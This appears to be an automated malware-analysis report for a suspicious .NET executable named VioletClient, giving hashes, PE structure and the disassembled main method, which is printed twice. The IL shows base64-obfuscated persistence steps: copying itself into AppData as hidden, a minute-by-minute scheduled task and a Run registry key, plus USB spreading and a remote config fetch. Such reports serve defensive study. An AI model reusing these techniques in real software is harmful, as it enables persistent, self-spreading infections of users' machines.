Suspicious
Suspect

a344e6c30ee71eccc82f879911d7f5a8

PE Executable
|
MD5: a344e6c30ee71eccc82f879911d7f5a8
|
Size: 1.48 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
 Hash Value
MD5
a344e6c30ee71eccc82f879911d7f5a8
Sha1
9a02d1e4e5bdae37eba8b981085a1819f0f6790c
Sha256
95565b3507424e5c24ea032e13d214ba62969df25c41c878eaf833453cf28a25
Sha384
a402c7911e913489c9bec394d5d08baa63bc0137087a1feb64d8de6169372732fa8c673234ff4bc313d6d92de21dd178
Sha512
21589385e0a7414c7871d324884b9ea6ab99f32da22cfc4e124aa395a9443f77ae5d5de050494a13eb1c8ff62dc4c3162b3ef7a10db0376e5b0e025209092725
SSDeep
12288:qz9ZYOJ4eAj/bJCnO6RzVAD0LZSKoO3dZsZrp4jUAaBMPDCmES1OvcPhvBWZUzvh:07sbMx104BloHepgAH17aBiCi
TLSH
91659B2868BB506D9573FF617EDCB9EADDDE2E522509645B1081370B8932F80EE4383D

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
a344e6c30ee71eccc82f879911d7f5a8
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

microsoft
Full Name

microsoft
EntryPoint

System.Void HFEoaJWs.SQZRSFuwQGc::QtCqpLoCn8Ofz3kseiHq()
Scope Name

microsoft
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

VioletClient
Assembly Version

7.13.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

453
Main Method

System.Void HFEoaJWs.SQZRSFuwQGc::QtCqpLoCn8Ofz3kseiHq()
Main IL Instruction Count

278
Main IL

call System.Void HFEoaJWs.IRFCHIznjtC::PMVDhtOuXZdZHGnOfUhz() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Void HFEoaJWs.FVOUDHXDSaTjaD::AEdjhbp1cmsAp14J7N5H() call System.Boolean HFEoaJWs.GEEUUDkftnj::3eglCiYjeO0zhbTiGmxX() brtrue IL_0024: ldc.i4.3 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.3 <null> stloc.3 <null> ldc.i4.4 <null> stloc.s V_4 ldloc.3 <null> ldloc.s V_4 add.ovf <null> stloc.s V_5 ldloc.s V_5 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_6 ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ ldloc.s V_6 call System.Void System.IO.File::Copy(System.String,System.String) ldloc.s V_6 newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 ldc.i4 128 callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) leave IL_0094: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0094: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) stloc.0 <null> ldloc.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ ldloc.1 <null> call System.Void System.IO.File::Copy(System.String,System.String) leave IL_00F7: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_00F7: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr c2NodGFza3MuZXhl call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_11 ldloc.s V_11 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_11 ldc.i4.5 <null> newarr System.String stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr L2NyZWF0ZSAvZiAvc2MgbWludXRlIC9tbyAxIC90biAi call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.1 <null> ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_21 ldc.i4.2 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr IiAvdHIgIg== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_21 ldc.i4.4 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Ig== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_11 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_10 ldloc.s V_10 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave IL_01B6: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_01B6: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_13 call My.MyComputer My.MyProject::Iw87DgrmaA4ZcHEKA79V() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.s V_13 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ ldloc.s V_13 call System.Void System.IO.File::Copy(System.String,System.String) leave IL_0254: ldsfld HFEoaJWs.USB HFEoaJWs.ApWMp::H6Qb84SeTH6tYEfDCrct dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0254: ldsfld HFEoaJWs.USB HFEoaJWs.ApWMp::H6Qb84SeTH6tYEfDCrct ldsfld HFEoaJWs.USB HFEoaJWs.ApWMp::H6Qb84SeTH6tYEfDCrct callvirt System.Void HFEoaJWs.USB::N17MedRUunLcjHN98QUZ() ldsfld System.Boolean HFEoaJWs.ApWMp::aP11RIXiv8seyrkKzu7L brfalse IL_03AE: ldnull ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) ldsfld System.String HFEoaJWs.ApWMp::wWfCxdjwcgEEyFJmWuUE call System.Net.WebRequest System.Net.WebRequest::Create(System.String) castclass System.Net.HttpWebRequest stloc.s V_15 ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr R0VU call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_Method(System.String) ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr TW96aWxsYS81LjA= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_UserAgent(System.String) ldloc.s V_15 callvirt System.Net.WebResponse System.Net.HttpWebRequest::GetResponse() castclass System.Net.HttpWebResponse stloc.s V_16 ldloc.s V_16 callvirt System.IO.Stream System.Net.HttpWebResponse::GetResponseStream() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream) stloc.s V_17 ldloc.s V_17 callvirt System.String System.IO.StreamReader::ReadLine() stloc.s V_18 br IL_035B: ldloc.s V_18 ldloc.s V_18 call System.Boolean System.String::IsNullOrWhiteSpace(System.String) brtrue IL_0352: ldloc.s V_17 ldloc.s V_18 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Og== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Boolean System.String::Contains(System.String) brfalse IL_0352: ldloc.s V_17 ldloc.s V_18 ldc.i4.1 <null> newarr System.Char stloc.s V_22 ldloc.s V_22 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_22 ldc.i4.2 <null> callvirt System.String[] System.String::Split(System.Char[],System.Int32) stloc.s V_19 ldloc.s V_19 ldlen <null> conv.ovf.i4 <null> ldc.i4.2 <null> bne.un IL_0352: ldloc.s V_17 ldloc.s V_19 ldc.i4.0 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String HFEoaJWs.ApWMp::biMy4FwTUMhZEwPzAB1y ldloc.s V_19 ldc.i4.1 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String HFEoaJWs.ApWMp::xCyXfE5Vv00FgpVUvsxC ldloc.s V_17 callvirt System.String System.IO.StreamReader::ReadLine() stloc.s V_18 ldloc.s V_18 brtrue IL_02E5: ldloc.s V_18 leave IL_0376: leave IL_038A ldloc.s V_17 brfalse IL_0375: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_038A: leave IL_03AE ldloc.s V_16 brfalse IL_0389: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_03AE: ldnull dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_20 ldloc.s V_20 callvirt System.String System.Exception::get_Message() call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String) pop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_03AE: ldnull ldnull <null> ldftn System.Void HFEoaJWs.SQZRSFuwQGc::pAOkR3pk50PZWdsQukH7() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Module Name

microsoft
Full Name

microsoft
EntryPoint

System.Void HFEoaJWs.SQZRSFuwQGc::QtCqpLoCn8Ofz3kseiHq()
Scope Name

microsoft
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

VioletClient
Assembly Version

7.13.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

453
Main Method

System.Void HFEoaJWs.SQZRSFuwQGc::QtCqpLoCn8Ofz3kseiHq()
Main IL Instruction Count

278
Main IL

call System.Void HFEoaJWs.IRFCHIznjtC::PMVDhtOuXZdZHGnOfUhz() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Void HFEoaJWs.FVOUDHXDSaTjaD::AEdjhbp1cmsAp14J7N5H() call System.Boolean HFEoaJWs.GEEUUDkftnj::3eglCiYjeO0zhbTiGmxX() brtrue IL_0024: ldc.i4.3 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.3 <null> stloc.3 <null> ldc.i4.4 <null> stloc.s V_4 ldloc.3 <null> ldloc.s V_4 add.ovf <null> stloc.s V_5 ldloc.s V_5 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_6 ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ ldloc.s V_6 call System.Void System.IO.File::Copy(System.String,System.String) ldloc.s V_6 newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 ldc.i4 128 callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) leave IL_0094: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0094: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) stloc.0 <null> ldloc.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ ldloc.1 <null> call System.Void System.IO.File::Copy(System.String,System.String) leave IL_00F7: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_00F7: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr c2NodGFza3MuZXhl call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_11 ldloc.s V_11 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_11 ldc.i4.5 <null> newarr System.String stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr L2NyZWF0ZSAvZiAvc2MgbWludXRlIC9tbyAxIC90biAi call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.1 <null> ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_21 ldc.i4.2 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr IiAvdHIgIg== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_21 ldc.i4.4 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Ig== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_11 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_10 ldloc.s V_10 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave IL_01B6: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_01B6: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_13 call My.MyComputer My.MyProject::Iw87DgrmaA4ZcHEKA79V() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.s V_13 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ ldloc.s V_13 call System.Void System.IO.File::Copy(System.String,System.String) leave IL_0254: ldsfld HFEoaJWs.USB HFEoaJWs.ApWMp::H6Qb84SeTH6tYEfDCrct dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0254: ldsfld HFEoaJWs.USB HFEoaJWs.ApWMp::H6Qb84SeTH6tYEfDCrct ldsfld HFEoaJWs.USB HFEoaJWs.ApWMp::H6Qb84SeTH6tYEfDCrct callvirt System.Void HFEoaJWs.USB::N17MedRUunLcjHN98QUZ() ldsfld System.Boolean HFEoaJWs.ApWMp::aP11RIXiv8seyrkKzu7L brfalse IL_03AE: ldnull ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) ldsfld System.String HFEoaJWs.ApWMp::wWfCxdjwcgEEyFJmWuUE call System.Net.WebRequest System.Net.WebRequest::Create(System.String) castclass System.Net.HttpWebRequest stloc.s V_15 ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr R0VU call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_Method(System.String) ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr TW96aWxsYS81LjA= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_UserAgent(System.String) ldloc.s V_15 callvirt System.Net.WebResponse System.Net.HttpWebRequest::GetResponse() castclass System.Net.HttpWebResponse stloc.s V_16 ldloc.s V_16 callvirt System.IO.Stream System.Net.HttpWebResponse::GetResponseStream() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream) stloc.s V_17 ldloc.s V_17 callvirt System.String System.IO.StreamReader::ReadLine() stloc.s V_18 br IL_035B: ldloc.s V_18 ldloc.s V_18 call System.Boolean System.String::IsNullOrWhiteSpace(System.String) brtrue IL_0352: ldloc.s V_17 ldloc.s V_18 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Og== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Boolean System.String::Contains(System.String) brfalse IL_0352: ldloc.s V_17 ldloc.s V_18 ldc.i4.1 <null> newarr System.Char stloc.s V_22 ldloc.s V_22 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_22 ldc.i4.2 <null> callvirt System.String[] System.String::Split(System.Char[],System.Int32) stloc.s V_19 ldloc.s V_19 ldlen <null> conv.ovf.i4 <null> ldc.i4.2 <null> bne.un IL_0352: ldloc.s V_17 ldloc.s V_19 ldc.i4.0 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String HFEoaJWs.ApWMp::biMy4FwTUMhZEwPzAB1y ldloc.s V_19 ldc.i4.1 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String HFEoaJWs.ApWMp::xCyXfE5Vv00FgpVUvsxC ldloc.s V_17 callvirt System.String System.IO.StreamReader::ReadLine() stloc.s V_18 ldloc.s V_18 brtrue IL_02E5: ldloc.s V_18 leave IL_0376: leave IL_038A ldloc.s V_17 brfalse IL_0375: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_038A: leave IL_03AE ldloc.s V_16 brfalse IL_0389: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_03AE: ldnull dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_20 ldloc.s V_20 callvirt System.String System.Exception::get_Message() call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String) pop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_03AE: ldnull ldnull <null> ldftn System.Void HFEoaJWs.SQZRSFuwQGc::pAOkR3pk50PZWdsQukH7() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
a344e6c30ee71eccc82f879911d7f5a8 (1.48 MB)
File Structure
a344e6c30ee71eccc82f879911d7f5a8
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙